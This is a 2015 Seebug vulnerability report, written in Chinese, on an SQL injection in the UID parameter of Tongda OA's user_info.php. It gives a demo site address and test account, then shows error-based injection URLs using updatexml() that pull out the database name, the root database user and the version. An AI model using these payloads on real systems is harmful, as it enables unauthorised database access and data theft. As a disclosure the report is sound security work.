通达OA某处SQL注入,root权限(demo测试)

2015-03-13T00:00:00
ID SSV:96113
Type seebug
Reporter Root
Modified 2015-03-13T00:00:00

Description

简要描述:

RT

详细说明:

通达OA(国际版)某处SQL注入,demo成功演示 大神提交那么多,吓我一跳: WooYun: 通达T9 oa系统sql注射12处打包(demo站点root权限) 还好没重复。 存在漏洞的文件为:/general/ipanel/user/user_info.php 参数UID存在注入 国际版演示demo地址:http://t9.go2oa.com:86/ 测试帐号及密码 cw/无

<img src="https://images.seebug.org/upload/201503/131053036f610ce8d1ab2fb385b515a8f51a13c4.png" alt="0313_1.png" width="600" onerror="javascript:errimg(this);">

访问URL:http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1&USER_ID=admin 正常显示:

<img src="https://images.seebug.org/upload/201503/13105831d14e90e731bf5c0a38efe803a7bf65c1.png" alt="0305_2.png" width="600" onerror="javascript:errimg(this);">

正常访问情况下,档案信息处提示:

未设置公开字段

<img src="https://images.seebug.org/upload/201503/131059222fd20e504a8c5a88f36cd93e642696e9.png" alt="0305_3.png" width="600" onerror="javascript:errimg(this);">

参数UID处输入:' 提示报错,如图:

<img src="https://images.seebug.org/upload/201503/13110950444075389ce457ef9f7172d4a7b6fa4b.png" alt="0305_4.png" width="600" onerror="javascript:errimg(this);">

'被转义了,发现注入地方出在()内,所以构造,继续输入and 1=1和and 1=2

<img src="https://images.seebug.org/upload/201503/13110044502d78fde5848fbe7f54caf9b44cad87.png" alt="0305_5.png" width="600" onerror="javascript:errimg(this);">

报错注入,如图: 获取数据库

http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1) and 1=((updatexml(1,concat(0x24,(select database()),0x24),1))&USER_ID=admin

<img src="https://images.seebug.org/upload/201503/131102266a7697a7c69682fc028354abbdf2aff6.png" alt="0305_6.png" width="600" onerror="javascript:errimg(this);">

数据库:

td_oa

获取用户:

http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1) and 1=((updatexml(1,concat(0x24,(select user()),0x24),1))&USER_ID=admin

<img src="https://images.seebug.org/upload/201503/13110320d011429e820ac93bba4df8777706e636.png" alt="0305_7.png" width="600" onerror="javascript:errimg(this);">

root@127.0.0.1

数据库版本:

http://t9.go2oa.com:86/general/ipanel/user/user_info.php?UID=1) and 1=((updatexml(1,concat(0x24,(select version()),0x24),1))&USER_ID=admin

<img src="https://images.seebug.org/upload/201503/131106547c0cd345abe3702bc26a79b8c1eadbb2.png" alt="0305_8.png" width="600" onerror="javascript:errimg(this);">

后面的操作就不一一演示了。。。

漏洞证明:

见详细说明。。。